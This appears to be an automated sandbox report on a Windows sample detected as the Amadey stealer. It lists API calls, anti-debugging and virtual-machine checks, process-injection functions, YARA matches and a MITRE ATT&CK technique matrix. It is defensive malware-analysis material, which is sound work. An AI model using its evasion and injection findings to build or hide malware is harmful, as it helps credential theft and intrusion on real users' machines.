                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 2.9 %
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeAPI coverage: 1.6 %
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeAPI coverage: 7.3 %
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 2024Thread sleep count: 51 > 30
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 2024Thread sleep time: -1530000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 6288Thread sleep time: -540000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe TID: 2024Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043DCB0 FindFirstFileExW,0_2_0043DCB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044FDF17 FindFirstFileExW,0_2_044FDF17
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043DCB0 FindFirstFileExW,23_2_0043DCB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044BDF17 FindFirstFileExW,23_2_044BDF17
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043DCB0 FindFirstFileExW,33_2_0043DCB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0454DF17 FindFirstFileExW,33_2_0454DF17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407DA0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00407DA0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 30000
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeThread delayed: delay time: 30000
                Source: Amcache.hve.4.drBinary or memory string: VMware
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: file.exe, Hkbsse.exe.0.dr, 9f93a2.33.dr, random[1].exe.33.drBinary or memory string: hGfS:=
                Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00436BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C0A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042C0A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043A3A2 mov eax, dword ptr fs:[00000030h]0_2_0043A3A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043663B mov eax, dword ptr fs:[00000030h]0_2_0043663B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0295FC4B push dword ptr fs:[00000030h]0_2_0295FC4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044FA609 mov eax, dword ptr fs:[00000030h]0_2_044FA609
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044C0D90 mov eax, dword ptr fs:[00000030h]0_2_044C0D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044F68A2 mov eax, dword ptr fs:[00000030h]0_2_044F68A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044C092B mov eax, dword ptr fs:[00000030h]0_2_044C092B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043A3A2 mov eax, dword ptr fs:[00000030h]23_2_0043A3A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0043663B mov eax, dword ptr fs:[00000030h]23_2_0043663B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_02891AFB push dword ptr fs:[00000030h]23_2_02891AFB
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044BA609 mov eax, dword ptr fs:[00000030h]23_2_044BA609
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_04480D90 mov eax, dword ptr fs:[00000030h]23_2_04480D90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044B68A2 mov eax, dword ptr fs:[00000030h]23_2_044B68A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0448092B mov eax, dword ptr fs:[00000030h]23_2_0448092B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043A3A2 mov eax, dword ptr fs:[00000030h]33_2_0043A3A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043663B mov eax, dword ptr fs:[00000030h]33_2_0043663B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_02B63E0B push dword ptr fs:[00000030h]33_2_02B63E0B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0454A609 mov eax, dword ptr fs:[00000030h]33_2_0454A609
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04510D90 mov eax, dword ptr fs:[00000030h]33_2_04510D90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_045468A2 mov eax, dword ptr fs:[00000030h]33_2_045468A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0451092B mov eax, dword ptr fs:[00000030h]33_2_0451092B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0043EF06 GetProcessHeap,33_2_0043EF06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D2F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041D2F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00436BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DCB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DCB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DE1A SetUnhandledExceptionFilter,0_2_0041DE1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044DD55E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_044DD55E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044F6E25 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_044F6E25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044DDF1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_044DDF1C
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041D2F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0041D2F7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00436BBE
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041DCB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0041DCB5
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041DE1A SetUnhandledExceptionFilter,23_2_0041DE1A
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0449D55E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0449D55E
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044B6E25 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_044B6E25
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0449DF1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0449DF1C
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00436BBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00436BBE
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041D2F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0041D2F7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041DCB5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0041DCB5
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041DE1A SetUnhandledExceptionFilter,33_2_0041DE1A
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0452D55E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0452D55E
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04546E25 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_04546E25
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0452DF1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0452DF1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407110 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_00407110
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DEA1 cpuid 0_2_0041DEA1
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3bca58cece\9f93a2 VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A9D9 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040A9D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B170 GetUserNameA,0_2_0040B170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004425B7 _free,_free,_free,GetTimeZoneInformation,_free,0_2_004425B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407DA0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00407DA0
                Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Amadey
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Yara detected Amadeys stealer DLL
                Source: Yara matchFile source: 23.3.Hkbsse.exe.4530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.Hkbsse.exe.4530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.Hkbsse.exe.4580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.44c0e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.4480e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.4480e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.3.Hkbsse.exe.4580000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.4510e67.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4530000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.Hkbsse.exe.4510e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.Hkbsse.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.44c0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000021.00000003.2753930004.0000000004580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.2238394423.0000000004530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2134722904.0000000004530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2878258243.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042E062 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_0042E062
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042ED59 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_0042ED59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044EE2C9 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_044EE2C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044EEFC0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_044EEFC0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0042E062 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,23_2_0042E062
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0042ED59 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,23_2_0042ED59
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044AE2C9 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,23_2_044AE2C9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044AEFC0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,23_2_044AEFC0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0042E062 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,33_2_0042E062
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00402400 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,33_2_00402400
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0042ED59 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,33_2_0042ED59
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453E2C9 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,33_2_0453E2C9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453EFC0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,33_2_0453EFC0

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		111
                Process Injection                		21
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Scheduled Task/Job                		31
                Virtualization/Sandbox Evasion                		LSASS Memory41
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Native API                		Logon Script (Windows)1
                DLL Side-Loading                		111
                Process Injection                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                Software Packing                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync2
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem35
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
